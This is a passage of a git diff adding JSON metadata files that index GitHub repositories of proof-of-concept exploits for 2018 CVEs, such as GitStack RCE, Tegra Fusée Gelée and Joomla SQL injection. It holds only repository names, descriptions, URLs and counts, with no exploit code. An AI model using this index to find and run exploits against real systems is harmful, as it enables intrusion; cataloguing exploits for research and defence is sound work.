"pushed_at": "2018-03-19T07:29:42Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-5146.json b/2018/CVE-2018-5146.json new file mode 100644 index 0000000000..2192a82d51 --- /dev/null +++ b/2018/CVE-2018-5146.json @@ -0,0 +1,33 @@ +[ + { + "id": 479890786, + "name": "CVE-2018-5146", + "full_name": "f01965\/CVE-2018-5146", + "owner": { + "login": "f01965", + "id": 29837345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29837345?v=4", + "html_url": "https:\/\/github.com\/f01965", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f01965\/CVE-2018-5146", + "description": null, + "fork": false, + "created_at": "2022-04-10T02:12:37Z", + "updated_at": "2022-04-10T02:20:19Z", + "pushed_at": "2022-04-10T02:21:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-5158.json b/2018/CVE-2018-5158.json new file mode 100644 index 0000000000..60ea897449 --- /dev/null +++ b/2018/CVE-2018-5158.json @@ -0,0 +1,64 @@ +[ + { + "id": 361168922, + "name": "CVE-2018-5158", + "full_name": "ppcrab\/CVE-2018-5158", + "owner": { + "login": "ppcrab", + "id": 39876329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39876329?v=4", + "html_url": "https:\/\/github.com\/ppcrab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ppcrab\/CVE-2018-5158", + "description": null, + "fork": false, + "created_at": "2021-04-24T13:28:14Z", + "updated_at": "2023-12-29T05:42:42Z", + "pushed_at": "2021-04-24T13:41:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 748568686, + "name": "-CVE-2018-5158.pdf", + "full_name": "puzzle-tools\/-CVE-2018-5158.pdf", + "owner": { + "login": "puzzle-tools", + "id": 150365406, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150365406?v=4", + "html_url": "https:\/\/github.com\/puzzle-tools", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puzzle-tools\/-CVE-2018-5158.pdf", + "description": "a simple PDF file for CVE-2018-5158", + "fork": false, + "created_at": "2024-01-26T09:19:55Z", + "updated_at": "2024-01-26T09:19:55Z", + "pushed_at": "2024-01-26T11:45:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-5234.json b/2018/CVE-2018-5234.json new file mode 100644 index 0000000000..fb0724e4e3 --- /dev/null +++ b/2018/CVE-2018-5234.json @@ -0,0 +1,70 @@ +[ + { + "id": 131737249, + "name": "ble_norton_core", + "full_name": "embedi\/ble_norton_core", + "owner": { + "login": "embedi", + "id": 24190344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24190344?v=4", + "html_url": "https:\/\/github.com\/embedi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/embedi\/ble_norton_core", + "description": "PoC exploit for CVE-2018-5234", + "fork": false, + "created_at": "2018-05-01T16:40:30Z", + "updated_at": "2024-11-04T22:52:01Z", + "pushed_at": "2018-05-02T08:50:57Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 31, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 271201851, + "name": "ble_connect_rust", + "full_name": "saruman9\/ble_connect_rust", + "owner": { + "login": "saruman9", + "id": 4244396, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4244396?v=4", + "html_url": "https:\/\/github.com\/saruman9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saruman9\/ble_connect_rust", + "description": "Norton Core Secure WiFi PoC (CVE-2018-5234) on Rust.", + "fork": false, + "created_at": "2020-06-10T06:54:41Z", + "updated_at": "2024-02-10T19:05:39Z", + "pushed_at": "2020-06-10T06:55:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ble", + "cve-2018-5234", + "exploit", + "norton-core", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-5333.json b/2018/CVE-2018-5333.json new file mode 100644 index 0000000000..26cf6af243 --- /dev/null +++ b/2018/CVE-2018-5333.json @@ -0,0 +1,33 @@ +[ + { + "id": 709170585, + "name": "cve-2018-5333", + "full_name": "hoanganh2k\/cve-2018-5333", + "owner": { + "login": "hoanganh2k", + "id": 101629334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101629334?v=4", + "html_url": "https:\/\/github.com\/hoanganh2k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hoanganh2k\/cve-2018-5333", + "description": null, + "fork": false, + "created_at": "2023-10-24T07:02:35Z", + "updated_at": "2023-10-24T07:02:36Z", + "pushed_at": "2023-10-24T07:02:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-5353.json b/2018/CVE-2018-5353.json new file mode 100644 index 0000000000..550fca3ada --- /dev/null +++ b/2018/CVE-2018-5353.json @@ -0,0 +1,33 @@ +[ + { + "id": 299399882, + "name": "CVE-2018-5353", + "full_name": "missing0x00\/CVE-2018-5353", + "owner": { + "login": "missing0x00", + "id": 29318503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29318503?v=4", + "html_url": "https:\/\/github.com\/missing0x00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/missing0x00\/CVE-2018-5353", + "description": "CVE-2018-5353", + "fork": false, + "created_at": "2020-09-28T18:38:26Z", + "updated_at": "2020-09-28T21:32:28Z", + "pushed_at": "2020-09-28T21:32:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-5354.json b/2018/CVE-2018-5354.json new file mode 100644 index 0000000000..0ee0f6f35c --- /dev/null +++ b/2018/CVE-2018-5354.json @@ -0,0 +1,33 @@ +[ + { + "id": 299421954, + "name": "CVE-2018-5354", + "full_name": "missing0x00\/CVE-2018-5354", + "owner": { + "login": "missing0x00", + "id": 29318503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29318503?v=4", + "html_url": "https:\/\/github.com\/missing0x00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/missing0x00\/CVE-2018-5354", + "description": "CVE-2018-5354", + "fork": false, + "created_at": "2020-09-28T20:17:50Z", + "updated_at": "2020-09-28T21:38:02Z", + "pushed_at": "2020-09-28T21:38:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-5711.json b/2018/CVE-2018-5711.json new file mode 100644 index 0000000000..009973a903 --- /dev/null +++ b/2018/CVE-2018-5711.json @@ -0,0 +1,64 @@ +[ + { + "id": 119782218, + "name": "Test-7-2-0-PHP-CVE-2018-5711", + "full_name": "huzhenghui\/Test-7-2-0-PHP-CVE-2018-5711", + "owner": { + "login": "huzhenghui", + "id": 4843755, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4843755?v=4", + "html_url": "https:\/\/github.com\/huzhenghui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huzhenghui\/Test-7-2-0-PHP-CVE-2018-5711", + "description": null, + "fork": false, + "created_at": "2018-02-01T04:21:13Z", + "updated_at": "2018-02-02T07:40:36Z", + "pushed_at": "2018-02-01T06:24:20Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 119790221, + "name": "Test-7-2-1-PHP-CVE-2018-5711", + "full_name": "huzhenghui\/Test-7-2-1-PHP-CVE-2018-5711", + "owner": { + "login": "huzhenghui", + "id": 4843755, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4843755?v=4", + "html_url": "https:\/\/github.com\/huzhenghui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huzhenghui\/Test-7-2-1-PHP-CVE-2018-5711", + "description": null, + "fork": false, + "created_at": "2018-02-01T06:00:14Z", + "updated_at": "2018-02-02T04:30:18Z", + "pushed_at": "2018-02-01T06:23:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-5728.json b/2018/CVE-2018-5728.json new file mode 100644 index 0000000000..39edbe8462 --- /dev/null +++ b/2018/CVE-2018-5728.json @@ -0,0 +1,33 @@ +[ + { + "id": 205233294, + "name": "seatel_terminals", + "full_name": "ezelf\/seatel_terminals", + "owner": { + "login": "ezelf", + "id": 15113645, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15113645?v=4", + "html_url": "https:\/\/github.com\/ezelf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ezelf\/seatel_terminals", + "description": "[CVE-2018-5728] Terminal Satelitales Seatel exponen geolocalización ", + "fork": false, + "created_at": "2019-08-29T19:09:35Z", + "updated_at": "2024-08-12T19:52:29Z", + "pushed_at": "2019-08-30T23:51:59Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-5740.json b/2018/CVE-2018-5740.json new file mode 100644 index 0000000000..eab13984f6 --- /dev/null +++ b/2018/CVE-2018-5740.json @@ -0,0 +1,33 @@ +[ + { + "id": 144792218, + "name": "cve-2018-5740", + "full_name": "sischkg\/cve-2018-5740", + "owner": { + "login": "sischkg", + "id": 3468384, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3468384?v=4", + "html_url": "https:\/\/github.com\/sischkg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sischkg\/cve-2018-5740", + "description": null, + "fork": false, + "created_at": "2018-08-15T01:50:41Z", + "updated_at": "2023-05-30T10:18:31Z", + "pushed_at": "2018-08-15T06:25:14Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-5767.json b/2018/CVE-2018-5767.json new file mode 100644 index 0000000000..a9e8519360 --- /dev/null +++ b/2018/CVE-2018-5767.json @@ -0,0 +1,64 @@ +[ + { + "id": 702591170, + "name": "CVE-2018-5767-AC9", + "full_name": "db44k\/CVE-2018-5767-AC9", + "owner": { + "login": "db44k", + "id": 147072065, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147072065?v=4", + "html_url": "https:\/\/github.com\/db44k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/db44k\/CVE-2018-5767-AC9", + "description": "An implementation of a proof-of-concept for CVE-2018-5767 (https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-5767)", + "fork": false, + "created_at": "2023-10-09T15:51:04Z", + "updated_at": "2023-10-09T15:51:50Z", + "pushed_at": "2023-10-09T15:53:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 733173832, + "name": "CVE-2018-5767-AC9", + "full_name": "Scorpion-Security-Labs\/CVE-2018-5767-AC9", + "owner": { + "login": "Scorpion-Security-Labs", + "id": 128519225, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128519225?v=4", + "html_url": "https:\/\/github.com\/Scorpion-Security-Labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Scorpion-Security-Labs\/CVE-2018-5767-AC9", + "description": "An implementation of a proof-of-concept for CVE-2018-5767", + "fork": false, + "created_at": "2023-12-18T18:17:45Z", + "updated_at": "2023-12-18T18:25:01Z", + "pushed_at": "2023-12-18T18:22:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-5873.json b/2018/CVE-2018-5873.json new file mode 100644 index 0000000000..17951f98c2 --- /dev/null +++ b/2018/CVE-2018-5873.json @@ -0,0 +1,33 @@ +[ + { + "id": 679230392, + "name": "linux-4.1.15_CVE-2018-5873", + "full_name": "Trinadh465\/linux-4.1.15_CVE-2018-5873", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.1.15_CVE-2018-5873", + "description": null, + "fork": false, + "created_at": "2023-08-16T11:35:08Z", + "updated_at": "2023-08-16T11:42:06Z", + "pushed_at": "2023-08-16T11:40:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-5951.json b/2018/CVE-2018-5951.json new file mode 100644 index 0000000000..e028f709c3 --- /dev/null +++ b/2018/CVE-2018-5951.json @@ -0,0 +1,33 @@ +[ + { + "id": 118846181, + "name": "CVE-2018-5951", + "full_name": "Nat-Lab\/CVE-2018-5951", + "owner": { + "login": "Nat-Lab", + "id": 18462539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18462539?v=4", + "html_url": "https:\/\/github.com\/Nat-Lab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nat-Lab\/CVE-2018-5951", + "description": "MikroTik RouterOS Denial of Service Vulnerability", + "fork": false, + "created_at": "2018-01-25T01:40:02Z", + "updated_at": "2024-08-12T19:35:45Z", + "pushed_at": "2018-02-11T06:51:29Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-5955.json b/2018/CVE-2018-5955.json new file mode 100644 index 0000000000..4dc45144ae --- /dev/null +++ b/2018/CVE-2018-5955.json @@ -0,0 +1,118 @@ +[ + { + "id": 148261072, + "name": "GitStackRCE", + "full_name": "b0bac\/GitStackRCE", + "owner": { + "login": "b0bac", + "id": 11972644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11972644?v=4", + "html_url": "https:\/\/github.com\/b0bac", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0bac\/GitStackRCE", + "description": "GitStackRCE漏洞(CVE-2018-5955)EXP", + "fork": false, + "created_at": "2018-09-11T04:39:43Z", + "updated_at": "2021-10-06T07:08:24Z", + "pushed_at": "2018-09-11T04:40:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 229491909, + "name": "Cerberus", + "full_name": "YagamiiLight\/Cerberus", + "owner": { + "login": "YagamiiLight", + "id": 58111801, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58111801?v=4", + "html_url": "https:\/\/github.com\/YagamiiLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YagamiiLight\/Cerberus", + "description": "一款功能强大的漏洞扫描器,子域名爆破使用aioDNS,asyncio异步快速扫描,覆盖目标全方位资产进行批量漏洞扫描,中间件信息收集,自动收集ip代理,探测Waf信息时自动使用来保护本机真实Ip,在本机Ip被Waf杀死后,自动切换代理Ip进行扫描,Waf信息收集(国内外100+款waf信息)包括安全狗,云锁,阿里云,云盾,腾讯云等,提供部分已知waf bypass 方案,中间件漏洞检测(Thinkphp,weblogic等 CVE-2018-5955,CVE-2018-12613,CVE-2018-11759等),支持SQL注入, XSS, 命令执行,文件包含, ssrf 漏洞扫描, 支持自定义漏洞邮箱推送功能", + "fork": false, + "created_at": "2019-12-21T22:45:55Z", + "updated_at": "2024-11-14T04:30:04Z", + "pushed_at": "2020-01-05T21:46:25Z", + "stargazers_count": 649, + "watchers_count": 649, + "has_discussions": false, + "forks_count": 128, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bypass", + "hacking-tool", + "middleware", + "penetration-testing", + "proxy", + "python", + "security-tools", + "sql-injection", + "ssrf", + "waf", + "websecurity", + "xss" + ], + "visibility": "public", + "forks": 128, + "watchers": 649, + "score": 0, + "subscribers_count": 16 + }, + { + "id": 657774080, + "name": "CVE-2018-5955", + "full_name": "MikeTheHash\/CVE-2018-5955", + "owner": { + "login": "MikeTheHash", + "id": 80423783, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80423783?v=4", + "html_url": "https:\/\/github.com\/MikeTheHash", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MikeTheHash\/CVE-2018-5955", + "description": "An exploit for CVE-2018-5955 GitStack 2.3.10 Unauthenticated RCE", + "fork": false, + "created_at": "2023-06-23T20:25:47Z", + "updated_at": "2024-11-17T20:05:51Z", + "pushed_at": "2024-11-15T16:36:27Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2018-5955", + "exploit", + "gitstack", + "hacking", + "php", + "vulnerabilities", + "web-application", + "web-hacking" + ], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6065.json b/2018/CVE-2018-6065.json new file mode 100644 index 0000000000..6de7a2a7bd --- /dev/null +++ b/2018/CVE-2018-6065.json @@ -0,0 +1,35 @@ +[ + { + "id": 361151258, + "name": "CVE-2018-6065-exploit", + "full_name": "b1tg\/CVE-2018-6065-exploit", + "owner": { + "login": "b1tg", + "id": 33436708, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33436708?v=4", + "html_url": "https:\/\/github.com\/b1tg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b1tg\/CVE-2018-6065-exploit", + "description": null, + "fork": false, + "created_at": "2021-04-24T12:04:27Z", + "updated_at": "2023-03-21T18:57:40Z", + "pushed_at": "2021-04-29T02:26:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6066.json b/2018/CVE-2018-6066.json new file mode 100644 index 0000000000..f31d328ef2 --- /dev/null +++ b/2018/CVE-2018-6066.json @@ -0,0 +1,33 @@ +[ + { + "id": 556781678, + "name": "Ring0VBA", + "full_name": "DISREL\/Ring0VBA", + "owner": { + "login": "DISREL", + "id": 69538721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69538721?v=4", + "html_url": "https:\/\/github.com\/DISREL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DISREL\/Ring0VBA", + "description": "CVE-2018-6066 using VBA", + "fork": false, + "created_at": "2022-10-24T13:59:12Z", + "updated_at": "2024-05-15T06:21:17Z", + "pushed_at": "2022-10-24T15:44:18Z", + "stargazers_count": 64, + "watchers_count": 64, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 64, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6242.json b/2018/CVE-2018-6242.json new file mode 100644 index 0000000000..fc10460ab1 --- /dev/null +++ b/2018/CVE-2018-6242.json @@ -0,0 +1,164 @@ +[ + { + "id": 131405057, + "name": "NXLoader", + "full_name": "DavidBuchanan314\/NXLoader", + "owner": { + "login": "DavidBuchanan314", + "id": 13520633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13520633?v=4", + "html_url": "https:\/\/github.com\/DavidBuchanan314", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DavidBuchanan314\/NXLoader", + "description": "My first Android app: Launch Fusée Gelée payloads from stock Android (CVE-2018-6242)", + "fork": false, + "created_at": "2018-04-28T11:50:00Z", + "updated_at": "2024-11-22T21:23:56Z", + "pushed_at": "2022-12-11T10:44:39Z", + "stargazers_count": 528, + "watchers_count": 528, + "has_discussions": false, + "forks_count": 55, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2018-6242", + "exploit", + "nintendo", + "nintendo-switch", + "nintendo-switch-hacking", + "usb" + ], + "visibility": "public", + "forks": 55, + "watchers": 528, + "score": 0, + "subscribers_count": 55 + }, + { + "id": 134342730, + "name": "rcm-modchips", + "full_name": "reswitched\/rcm-modchips", + "owner": { + "login": "reswitched", + "id": 26338222, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26338222?v=4", + "html_url": "https:\/\/github.com\/reswitched", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reswitched\/rcm-modchips", + "description": "Collection of \"modchip\" designs for launching payloads via the Tegra RCM bug (CVE-2018-6242) ", + "fork": false, + "created_at": "2018-05-22T01:15:14Z", + "updated_at": "2023-01-20T17:28:05Z", + "pushed_at": "2018-05-22T07:44:42Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 21, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 263447074, + "name": "react-tegra-payload-launcher", + "full_name": "ChrisFigura\/react-tegra-payload-launcher", + "owner": { + "login": "ChrisFigura", + "id": 23131568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23131568?v=4", + "html_url": "https:\/\/github.com\/ChrisFigura", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ChrisFigura\/react-tegra-payload-launcher", + "description": "A WebUSB based payload launcher for devices vulnerable to CVE-2018-6242", + "fork": false, + "created_at": "2020-05-12T20:39:24Z", + "updated_at": "2024-10-04T21:33:26Z", + "pushed_at": "2023-01-06T13:16:23Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 293412780, + "name": "fusee-gelee", + "full_name": "austinhartzheim\/fusee-gelee", + "owner": { + "login": "austinhartzheim", + "id": 6235007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6235007?v=4", + "html_url": "https:\/\/github.com\/austinhartzheim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/austinhartzheim\/fusee-gelee", + "description": "Rust implementation of the Fusée Gelée exploit (CVE-2018-6242) for Tegra processors.", + "fork": false, + "created_at": "2020-09-07T03:28:15Z", + "updated_at": "2023-10-21T22:32:41Z", + "pushed_at": "2022-12-21T04:31:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 496370210, + "name": "fusee-toy", + "full_name": "Swiftloke\/fusee-toy", + "owner": { + "login": "Swiftloke", + "id": 22382655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22382655?v=4", + "html_url": "https:\/\/github.com\/Swiftloke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Swiftloke\/fusee-toy", + "description": "Implementation of CVE-2018-6242 (AKA Fusée Gelée, AKA shofel2)", + "fork": false, + "created_at": "2022-05-25T19:51:06Z", + "updated_at": "2022-05-25T19:56:38Z", + "pushed_at": "2022-05-25T19:56:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6341.json b/2018/CVE-2018-6341.json new file mode 100644 index 0000000000..2bdec109d9 --- /dev/null +++ b/2018/CVE-2018-6341.json @@ -0,0 +1,33 @@ +[ + { + "id": 616715720, + "name": "react16-ssr", + "full_name": "diwangs\/react16-ssr", + "owner": { + "login": "diwangs", + "id": 27280516, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27280516?v=4", + "html_url": "https:\/\/github.com\/diwangs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/diwangs\/react16-ssr", + "description": "CVE-2018-6341", + "fork": false, + "created_at": "2023-03-20T23:50:29Z", + "updated_at": "2023-03-20T23:53:50Z", + "pushed_at": "2023-03-20T23:53:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6376.json b/2018/CVE-2018-6376.json new file mode 100644 index 0000000000..812f1c812f --- /dev/null +++ b/2018/CVE-2018-6376.json @@ -0,0 +1,33 @@ +[ + { + "id": 121202213, + "name": "CVE-2018-6376", + "full_name": "knqyf263\/CVE-2018-6376", + "owner": { + "login": "knqyf263", + "id": 2253692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4", + "html_url": "https:\/\/github.com\/knqyf263", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knqyf263\/CVE-2018-6376", + "description": "Joomla!, Second Order SQL Injection", + "fork": false, + "created_at": "2018-02-12T05:02:52Z", + "updated_at": "2023-03-19T07:44:34Z", + "pushed_at": "2018-02-12T12:14:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6389.json b/2018/CVE-2018-6389.json new file mode 100644 index 0000000000..092c253dff --- /dev/null +++ b/2018/CVE-2018-6389.json @@ -0,0 +1,667 @@ +[ + { + "id": 120386140, + "name": "wordpress-fix-cve-2018-6389", + "full_name": "yolabingo\/wordpress-fix-cve-2018-6389", + "owner": { + "login": "yolabingo", + "id": 628954, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/628954?v=4", + "html_url": "https:\/\/github.com\/yolabingo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yolabingo\/wordpress-fix-cve-2018-6389", + "description": "Apache RewriteRule to mitigate potential DoS attack via 